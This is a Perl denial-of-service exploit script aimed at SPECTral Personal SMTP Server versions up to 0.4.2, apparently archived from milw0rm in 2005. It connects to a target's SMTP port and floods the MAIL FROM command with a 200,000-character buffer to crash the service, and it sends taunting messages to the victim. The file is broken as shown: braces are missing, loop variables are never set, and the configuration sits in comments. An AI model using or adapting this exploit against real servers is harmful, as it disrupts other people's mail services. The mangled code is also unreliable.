use IO::Socket;
###### Small config ################################
# #
# If service not DoSeD try to increase this value. #
# #
# Number of trys for DoS. #
# #
# $trys = 10; #
# #
# Quantity signs for atack. #
# #
# $buf = 200000; #
# #
if (@ARGV < 1)
print "\n /\n";
print " DoS - SPECTral Personal SMTP Server <= 0.4.2 b 338 \n";
print " Usage: Dos_sp_0.3.pl <ip> [port] \n";
print " Coded by GreenwooD Network Security Team \n\n";
print " ============< nst.void.ru >=========== \n";
print " /\n";
$ip = $ARGV[0];
$port = 25;
if ($ARGV[1])
print "\n [+] - Prepare to DoS on $ip:$port\n";
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $ip,
PeerPort => $port) or die "\n [-] - Can't connect to $ip:$port or already DoSeD\n";
$remote->send("HELO Victem. You going down today. You SMTP service vulnearable, update it. It is exploit usage.\r\n");
sleep $i;
$remote->send("MAIL FROM:<" . "A" x $buf . ">\r\n");
sleep $i;
$remote->send("RCPT TO:<Developers\@mail\.box>\r\n");
sleep $i;
sleep $i;
$remote->send(" This of shit letter! " . rand(10) . "\r\n");
sleep $i;
print " [t] - Number of try = $j\n";
} until ($j > $trys);
print " [+] - O yes! Service going down...\n";
# milw0rm.com [2005-03-28]